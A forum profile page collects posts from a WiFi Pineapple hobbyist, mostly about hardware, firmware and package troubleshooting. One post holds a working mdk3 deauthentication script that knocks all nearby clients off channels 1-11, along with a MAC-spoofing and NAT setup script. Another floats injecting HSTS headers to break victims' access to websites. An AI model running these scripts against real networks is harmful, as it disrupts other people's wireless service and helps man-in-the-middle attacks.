Jump to content

PineDominator

Dedicated Members
  • Posts

    1,078
  • Joined

  • Last visited

  • Days Won

    18

Everything posted by PineDominator

  1. Question. Why has the infusions folder been sub categorized? Is there a new hardware platform coming. MK5
  2. You also need 8MB flash or its not going to work with the pineapple firmware
  3. I got a 64MB ram version a while back and it works fine. Has full use of all 64MB. I haven't seen a version above 32MB since then.
  4. Make sure It has at least 32MB of ram as some stores are selling a 16MB versions
  5. No it doesn't stick after a reboot and u can't query what is blacked or whitelisted. That is why I made a module for blacklisting.
  6. Not the modules fault but is just how Dnsspoof works. Most devices will save dns queries from the past and thus won't get spoofed
  7. Try reflashing just to be safe. Another thing is the pigtail inside the pineapple can sometimes not be seated properly. Could try removing and then reseat. Be delicate.
  8. I had a bum antenna from one of my mark4s out of the box. Some have had there wifi chips fried. Not sure how
  9. Getting this error when trying to install tcpdump? other packages work root@Pineapple:/tmp# opkg --dest usb install tcpdump Unknown package 'tcpdump'. Collected errors: * opkg_install_cmd: Cannot install package tcpdump.
  10. Maybe? But u need atheros chipset to use karma on it. Plus n speeds
  11. Boba Fett check my script above. I found u have to specify all the channels or mdk3 won't channel hop. -c 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 11
  12. Could be that 2.4 ghz wifi networks occupie 3 channels.
  13. Hmm if it worked before I don't know what to say? Could try and remove the variable and quotes then type in the ssid within the command. Maybe something in your ssid is a sed command?
  14. Awesome :-) The one thing I would like to work on is save what monitor interface was created to a variable, instead of assuming mon0. Any thoughts on how to do this. Maybe grep and awk the out put from airmon-ng $1
  15. Thanks. But you're script is still useful because it's killing hostapd and running on the internal wifi. When whistle master's button module was working I tied the wps button to the deauth script. Only thing I had to do was because mdk3 had been installed to my usb it needs a sym link to the internal folder location. My mk4 setup script now sym links all opkg packages installed to usb to the internal folder structure.
  16. Try this. Let me know if it works sed -i 's/option ssid.*/option ssid '"$newSSID"'/g' /etc/config/wireless
  17. #!/bin/sh airmon-ng start $1 ifconfig $1 | awk '/HWaddr/ {print $5}' > /tmp/deauth-whitelist.txt mdk3 mon0 d -w /tmp/deauth-whitelist.txt -c 1,2,3,4,5,6,7,8,9,10,11 & sleep 35 killall -9 mdk3 airmon-ng stop mon0 This script is designed to work with an external wifi adapter like the Alfa NHA I used this script after connecting my external adapter to a router for internet. #!/bin/sh #Change the Mac address of the usb wifi to something random. ifconfig $1 down macchanger -A $1 ifconfig $1 up #WPA2 - Let's assume we're going to connect to a WPA2 network wpa_supplicant -B -D nl80211 -i $1 -c /usb/wpa_supplicant.conf #WEP - Uncomment if you want to conect to a WEP network #iwconfig $1 mode managed key your_key_here #iwconfig $1 essid "your access point name here" #OPEN - Uncomment if you want to conect to a WEP network #iwconfig $1 essid "your access point name here" #Setup ipforwarding via iptables. echo 1 > /proc/sys/net/ipv4/ip_forward #Reset iptables #iptables -F #iptables -X iptables -A FORWARD -o $1 -i br-lan -s 172.16.0.0/24 -m conntrack --ctstate NEW -jACCEPT iptables -A FORWARD -m conntrack --ctstate ESTABLISHED,RELATED -j ACCEPT iptables -A POSTROUTING -t nat -j MASQUERADE #Wait for 7 seconds to give enough time for association. sleep 7 #Grab an ip via DHCP udhcpc -i $1 the code above is to connect to a wireless router. now you can run the mdk3 script as such ./deauth.sh wlan1 wlan1 is the external wifi adapter already connected to a wireless access point the script will add the mac of wlan1 to a whitelist so mdk3 won't deauth it from the internet it then runs for 35 seconds, enough time to deauth all channels then it kills the process and disables the mon0 interface.
  18. Last July I made a setup script for mdk3 on the pineapple. I can dig it up if u you'd like. But I found that some devices would not deauth. Even though it does on others. It may be mdk3 on OpenWRT?
  19. This is because some mobile Web browsers require html4 and others html5. If someone has a better way let us know
  20. I made the decision to support the latest developments firmware only. Since there is only one repository. 2.7.7 is much better than 2.7 stability reasons
  21. WM great job:-) question, does version 2.9 use sslstrip 0.9?
  22. I had an idea a while ago to maybe inject the code that tells a browser that the site there at is HSTS. Basically screwing there browser. The next time they visit that site not on the pineapple they cant;-) could make it worse by speeding up the process by loading many domains/sites within a series of Iframes. Would this be possible?
×
×
  • Create New...